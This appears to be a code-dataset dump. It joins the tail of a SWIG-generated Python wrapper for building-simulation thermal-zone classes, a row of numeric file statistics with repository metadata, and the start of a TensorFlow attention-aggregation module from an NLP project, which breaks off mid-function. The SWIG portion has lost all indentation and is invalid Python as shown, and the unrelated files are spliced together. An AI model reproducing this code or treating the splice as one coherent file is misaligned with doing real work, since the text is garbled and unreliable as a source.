method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
class SimSpatialZone(base.SimGroup):
__swig_setmethods__ = {}
for _s in [base.SimGroup]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone, name, value)
__swig_getmethods__ = {}
for _s in [base.SimGroup]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone, name)
__repr__ = _swig_repr
def ZoneColorIndex(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ZoneColorIndex(self, *args)
def SHWFixtureSets(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_SHWFixtureSets(self, *args)
def ContainingBuilding(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ContainingBuilding(self, *args)
def ZoneTemplates(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ZoneTemplates(self, *args)
def OverrideTemplates(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_OverrideTemplates(self, *args)
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone
__del__ = lambda self: None
SimSpatialZone_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_swigregister
SimSpatialZone_swigregister(SimSpatialZone)
class SimSpatialZone_ThermalZone(SimSpatialZone):
__swig_setmethods__ = {}
for _s in [SimSpatialZone]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone, name, value)
__swig_getmethods__ = {}
for _s in [SimSpatialZone]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone
__del__ = lambda self: None
SimSpatialZone_ThermalZone_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_swigregister
SimSpatialZone_ThermalZone_swigregister(SimSpatialZone_ThermalZone)
class SimSpatialZone_ThermalZone_Default(SimSpatialZone_ThermalZone):
__swig_setmethods__ = {}
for _s in [SimSpatialZone_ThermalZone]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone_Default, name, value)
__swig_getmethods__ = {}
for _s in [SimSpatialZone_ThermalZone]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone_Default, name)
__repr__ = _swig_repr
def ZoneConditioningRequirement(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneConditioningRequirement(self, *args)
def HVACSystemType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_HVACSystemType(self, *args)
def UserDefinedHVACSystemType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_UserDefinedHVACSystemType(self, *args)
def InfiltrationRate(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_InfiltrationRate(self, *args)
def IsDaylitZone(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_IsDaylitZone(self, *args)
def NumberOfDaylightingSensors(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_NumberOfDaylightingSensors(self, *args)
def DesignIlluminance(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_DesignIlluminance(self, *args)
def LightingControlsType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_LightingControlsType(self, *args)
def ClassRef_ZoneTypeEnergy(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ClassRef_ZoneTypeEnergy(self, *args)
def AssignedSchedule(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_AssignedSchedule(self, *args)
def SimSpatialZone_DirRelNorth(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_DirRelNorth(self, *args)
def SimSpatialZone_XOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_XOrigin(self, *args)
def SimSpatialZone_YOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_YOrigin(self, *args)
def SimSpatialZone_ZOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZOrigin(self, *args)
def SimSpatialZone_Type(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Type(self, *args)
def SimSpatialZone_Mult(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Mult(self, *args)
def SimSpatialZone_CeilingHt(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_CeilingHt(self, *args)
def SimSpatialZone_Volume(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Volume(self, *args)
def SimSpatialZone_FloorArea(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_FloorArea(self, *args)
def SimSpatialZone_ZoneInsideConvAlgo(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZoneInsideConvAlgo(self, *args)
def SimSpatialZone_ZoneOutsdConvAlgo(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZoneOutsdConvAlgo(self, *args)
def SimSpatialZone_PartTotalFlrArea(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_PartTotalFlrArea(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ZoneName(self, *args)
def ZoneProp_UserViewFactors_bySurfName_FromSurface_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_FromSurface_1_121(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ToSurface_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ToSurface_1_121(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ViewFactor_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ViewFactor_1_121(self, *args)
def RmAirModelType_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_ZoneName(self, *args)
def RmAirModelType_RoomAirModType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_RoomAirModType(self, *args)
def RmAirModelType_AirTempCplngStrat(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_AirTempCplngStrat(self, *args)
def ZoneAirBalance_OutdoorAir_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_ZoneName(self, *args)
def ZoneAirBalance_OutdoorAir_AirBalanceMethod(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_AirBalanceMethod(self, *args)
def ZoneAirBalance_OutdoorAir_InducedOutdrAirDueToUnbalDuctLeak(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_InducedOutdrAirDueToUnbalDuctLeak(self, *args)
def ZoneAirBalance_OutdoorAir_InducedOutdrAirScheduleName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_InducedOutdrAirScheduleName(self, *args)
def ZoneHVAC_EquipConnections_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneName(self, *args)
def ZoneHVAC_EquipConnections_ZoneCondEqmtListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneCondEqmtListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirInletNodeOrNodeListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirInletNodeOrNodeListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirExhaustNodeOrNodeListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirExhaustNodeOrNodeListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirNodeName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirNodeName(self, *args)
def ZoneHVAC_EquipConnections_ZoneReturnAirNodeName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneReturnAirNodeName(self, *args)
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone_Default(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone_Default
__del__ = lambda self: None
SimSpatialZone_ThermalZone_Default_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_swigregister
SimSpatialZone_ThermalZone_Default_swigregister(SimSpatialZone_ThermalZone_Default)
class SimSpatialZone_ThermalZone_Default_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone_Default_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone_Default_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone_Default_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_assign(self, n, x)
def begin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_begin(self, *args)
def end(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_end(self, *args)
def rbegin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_rend(self, *args)
def at(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_at(self, *args)
def front(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_front(self, *args)
def back(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_back(self, *args)
def push_back(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_push_back(self, *args)
def pop_back(self):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_insert(self, *args)
def erase(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_swap(self, x)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone_Default_sequence
__del__ = lambda self: None
SimSpatialZone_ThermalZone_Default_sequence_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_swigregister
SimSpatialZone_ThermalZone_Default_sequence_swigregister(SimSpatialZone_ThermalZone_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 47.148148 | 158 | 0.787061 | 1,783 | 17,822 | 7.311834 | 0.108805 | 0.318325 | 0.375547 | 0.278745 | 0.751707 | 0.667562 | 0.641942 | 0.592007 | 0.540538 | 0.445118 | 0 | 0.002693 | 0.145607 | 17,822 | 377 | 159 | 47.27321 | 0.853484 | 0.016496 | 0 | 0.282143 | 1 | 0 | 0.017354 | 0.003996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.257143 | false | 0.007143 | 0.039286 | 0.228571 | 0.675 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1133aa955d7561751df65ce2d5075db8e7cae325 | 26,706 | py | Python | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | from functools import partial
import tensorflow as tf
import constants
import nn_utils
import transformation_fn
def copy_from_predicted(mode, train_attention_to_copy, eval_attention_to_copy):
attention_to_copy = train_attention_to_copy if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_to_copy
# check whether this thing is actually scores or if it's predictions, and needs
# to be expanded out to one-hot scores. If it's actually scores, dims should be
# batch x batch_seq_len x batch_seq_len, and thus rank should be 3
if len(attention_to_copy.get_shape()) < 3:
# use non-standard on and off values because we're going to softmax this later, and want the result to be 0/1
attention_to_copy = tf.one_hot(attention_to_copy, tf.shape(attention_to_copy)[-1], on_value=constants.VERY_LARGE,
off_value=constants.VERY_SMALL)
return tf.cast(tf.nn.softmax(attention_to_copy, dim=-1), tf.float32), None
def linear_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
#suppose attention_to_aggregated is in list
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated, weight = nn_utils.graph_aggregation_softmax_done(attention_to_aggregated, parser_dropout)
return tf.cast(attention_to_aggregated, tf.float32), weight
def mean_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
#suppose attention_to_aggregated is in list
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = nn_utils.graph_mean_aggregation(attention_to_aggregated, parser_dropout)
return tf.cast(attention_to_aggregated, tf.float32), None
def chain_linear_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, reduction_mode = "sum"):
#suppose attention_to_aggregated is in list
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated, weight = nn_utils.linear_graph_aggregation(attention_to_aggregated, reduction_mode)
return tf.cast(attention_to_aggregated, tf.float32), weight
def mean_aggregation_prob(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
#suppose attention_to_aggregated is in list
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = nn_utils.graph_mean_aggregation_prob(attention_to_aggregated, parser_dropout)
print("attention to aggregate", attention_to_aggregated)
return tf.cast(attention_to_aggregated, tf.float32), None
def pass_through(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = tf.squeeze(attention_to_aggregated, axis=[1])
return tf.cast(attention_to_aggregated, tf.float32), None
def linear_aggregation_by_mlp(mode, train_attention_aggregation, eval_attention_aggregation, v, mlp_dropout, projection_dim, parser_dropout=0.9, batch_norm=False):
attention_to_aggregated= train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
aggregated_attention, weight = nn_utils.graph_mlp_aggregation(attention_to_aggregated, v, mlp_dropout, projection_dim, parser_dropout, batch_norm)
# raise NotImplementedError
return tf.cast(aggregated_attention, tf.float32), weight
dispatcher = {
'copy_from_predicted': copy_from_predicted,
'linear_aggregation': linear_aggregation,
'mean_aggregation': mean_aggregation,
'mean_aggregation_prob': mean_aggregation_prob,
'linear_aggregation_mlp': linear_aggregation_by_mlp,
'chain_linear_aggregation': chain_linear_aggregation,
'pass_through': pass_through
}
def dispatch(fn_name):
try:
return dispatcher[fn_name]
except KeyError:
print('Undefined attention function `%s' % fn_name)
exit(1)
src_param_translator = {
"parse_bert_benepar": "parse_gold",
"label_bert_benepar": "parse_label",
"parse_bert_biaffine": "parse_gold",
"label_bert_biaffine": "parse_label",
"parse_label": "parse_label",
"parse_gold": "parse_gold"
}
transformation_fn_list = [
'get_labeled_adjacent_mtx',
'get_root_up_mtx',
'get_een_up_mtx',
'get_void_up_mtx',
'get_PreColMaskVoid_up_mtx',
'get_een_kup1down_mtx'
]
def get_params(mode, attn_map, train_outputs, features, labels, hparams, model_config, tokens_to_keep):
params = {'mode': mode}
params_map = attn_map['params']
# if attn_map['name']
# print("debug <attention fn get parameter>: ", params, params_map, features, labels)
for param_name, param_values in params_map.items():
# if this is a map-type param, do map lookups and pass those through
if 'labels' in param_values:
input_labels = []
for label_item in param_values['labels']:
if isinstance(label_item, dict):
# outputs = []
transformation_param = {}
for src in label_item['sources']:
#dangerous hack
if src in labels:
label = labels[src]
elif src in features:
label = features[src]
# print(src)
# print(src_param_translator[src])
transformation_param[src_param_translator[src]] = label
transformation_param['tokens_to_keep'] = tokens_to_keep
if "transformation_fn" in label_item:
transformation_fn_name = label_item['transformation_fn']
if hparams.use_hparams_transformation_fn:
transformation_fn_name = hparams.transformation_fn
print("transformation_fn_name:", transformation_fn_name)
# transformation_param['transformation_name'] = transformation_fn
if transformation_fn_name.startswith('get_hsdp_adjacent_mtx'):
func_name = transformation_fn_name[:21]
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
elif transformation_fn_name.startswith('get_k_adjacent_mtx_hard'):
func_name = transformation_fn_name[:23]
elif transformation_fn_name.startswith('get_k_adjacent_mtx'):
func_name = transformation_fn_name[:18]
elif transformation_fn_name.startswith('get_labeled_adjacent_mtx_add'):
func_name = transformation_fn_name[:28]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and not hparams.conll05:
transformation_param['num_labels'] = 45
else:
tf.logging.log("unknown dataset format")
raise ValueError
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif '_'.join(transformation_fn_name.split('_')[:4]) in transformation_fn_list:
func_name = '_'.join(transformation_fn_name.split('_')[:4])
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log("unknown dataset format")
raise ValueError
head_gen_fn = nn_utils.generating_head_mtx_from_head_label_dist
if "head_label_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "head_label_aggregation" in param_values:
head_label_aggregation = hparams.head_label_aggregation
else:
head_label_aggregation = param_values["head_label_aggregation"]
head_gen_fn = partial(head_gen_fn, head_label_aggregation=head_label_aggregation)
if "label_score_multiplier" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_multiplier" in param_values:
multiplier = hparams.label_score_multiplier
else:
multiplier = param_values["label_score_multiplier"]
head_gen_fn = partial(head_gen_fn, ls_multiplier=multiplier)
if "label_score_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_aggregation" in param_values:
label_score_aggregation = hparams.label_score_aggregation
else:
label_score_aggregation = param_values["label_score_aggregation"]
head_gen_fn = partial(head_gen_fn, label_score_aggregation=label_score_aggregation)
if "use_strength_bias" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "use_strength_bias" in param_values:
use_strength_bias = hparams.use_strength_bias
else:
use_strength_bias = param_values["use_strength_bias"]
head_gen_fn = partial(head_gen_fn, use_strength_bias=use_strength_bias)
if "head_dropout_rate" in param_values or hparams.use_hparams_head_dropout_option:
transformation_param['head_dropout'] = True
if not "head_dropout_rate" in param_values:
dropout = hparams.head_dropout_rate
else:
dropout = param_values['head_dropout_rate']
transformation_param['head_dropout_rate'] = dropout
if "head_replacing" in param_values or hparams.use_hparams_head_replacing_option:
transformation_param['head_replacing'] = True
if not "head_replacing" in param_values:
rate = hparams.head_dropout
else:
rate = param_values['head_replacing_rate']
transformation_param['head_replacing_rate'] = rate
if "label_replacing" in param_values or hparams.use_hparams_label_replacing_option:
transformation_param['label_replacing'] = True
if not "label_replacing" in param_values:
rate = hparams.label_dropout
else:
rate = param_values['label_replacing_rate']
transformation_param['label_replacing_rate'] = rate
if "on_prob" in param_values or hparams.use_hparams_on_prob_option:
if not "on_prob" in param_values:
rate = hparams.on_prob
else:
rate = param_values['on_prob']
transformation_param['on_prob'] = rate
if "prod_mode" in param_values or hparams.use_hparams_prod_mode_option:
if not "prod_mode" in param_values:
mode = hparams.prod_mode
else:
mode = param_values["prod_mode"]
transformation_param['prod_mode'] = mode
transformation_param['new_masking'] = hparams.new_masking
transformation_param['extreme_value'] = hparams.extreme_value
transformation_param['head_gen_fn_train'] = head_gen_fn
transformation_param['head_gen_fn_eval'] = head_gen_fn
elif transformation_fn_name.startswith('get_adjacent_mtx') and hparams.transformation_fn_norm == "none" and hparams.using_log_prob == True:
func_name = "get_adjacent_mtx_nonenorm_logprob"
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
elif transformation_fn_name.startswith('get_adjacent_mtx'):
func_name = transformation_fn_name[:16]
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
else:
func_name = transformation_fn
if 'allow_intermediate_nodes' in param_values:
transformation_param['allow_intermediate_nodes'] = param_values['allow_intermediate_nodes']
output = transformation_fn.dispatch(func_name)(**transformation_param)
input_labels += [output]
# params[param_name] = tf.expand_dims(output, 1)
else:
tf.logging.log(tf.logging.ERROR, "no transformation function specified")
raise NotImplementedError
else:
tf.logging.log(tf.logging.ERROR, "output entry must be a dict")
raise NotImplementedError
params[param_name] = tf.stack(input_labels, axis=1)
if 'reduction_mode' in param_values:
if hparams.use_hparams_aggregation_reduction_mode:
params['reduction_mode'] = hparams.aggregation_reduction_mode
else:
params['reduction_mode'] = param_values['reduction_mode']
elif 'label' in param_values:
if isinstance(param_values['label'], list): # only for compatability reason
params[param_name] = tf.stack([labels[src] for src in param_values['label']], axis=1)
elif isinstance(param_values['label'], dict): # only for compatability reason
params[param_name] = tf.stack([transformation_fn.dispatch(transformation_fn_name)(labels[src]) for src, transformation_fn_name in param_values['label'].items()], axis=1)
elif isinstance(param_values['label'], str): # only for compatability reason
params[param_name] = labels[param_values['label']]
else:
print('Undefined attention source format')
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams['mlp_dropout']
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'output' in param_values:
if isinstance(param_values['output'], dict): # only for compatability reason
# outputs_layer = train_outputs[param_values['layer']]
# params[param_name] = outputs_layer[param_values['output']]
params[param_name] = tf.stack([train_outputs[layer][output_name] for layer, output_name in param_values['output'].items()], axis=1)
# elif isinstance(param_values['output'], str): # only for compatability reason
# params[param_name] = labels[param_values['label']]
else:
print('Undefined attention source format')
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams['mlp_dropout']
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'outputs' in param_values:
outputs = []
for output_item in param_values['outputs']:
if isinstance(output_item, dict):
# outputs = []
transformation_param = {}
for layer_name, output_name in output_item['sources'].items():
outputs_layer = train_outputs[layer_name]
output = outputs_layer[output_name]
transformation_param['{}'.format(layer_name)] = output
transformation_param['tokens_to_keep'] = tokens_to_keep
if "transformation_fn" in output_item:
transformation_fn_name = output_item['transformation_fn']
if hparams.use_hparams_transformation_fn:
transformation_fn_name = hparams.transformation_fn
if transformation_fn_name.startswith('get_hsdp_adjacent_mtx'):
func_name = transformation_fn_name[:21]
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
elif transformation_fn_name.startswith('get_k_adjacent_mtx_hard'):
func_name = transformation_fn_name[:23]
elif transformation_fn_name.startswith('get_k_adjacent_mtx'):
func_name = transformation_fn_name[:18]
elif transformation_fn_name.startswith('get_labeled_adjacent_mtx_add'):
func_name = transformation_fn_name[:28]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log("unknown dataset format")
raise ValueError
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif '_'.join(transformation_fn_name.split('_')[:4]) in transformation_fn_list:
func_name = '_'.join(transformation_fn_name.split('_')[:4])
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log("unknown dataset format")
raise ValueError
head_gen_fn = nn_utils.generating_head_mtx_from_head_label_dist
if "head_label_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "head_label_aggregation" in param_values:
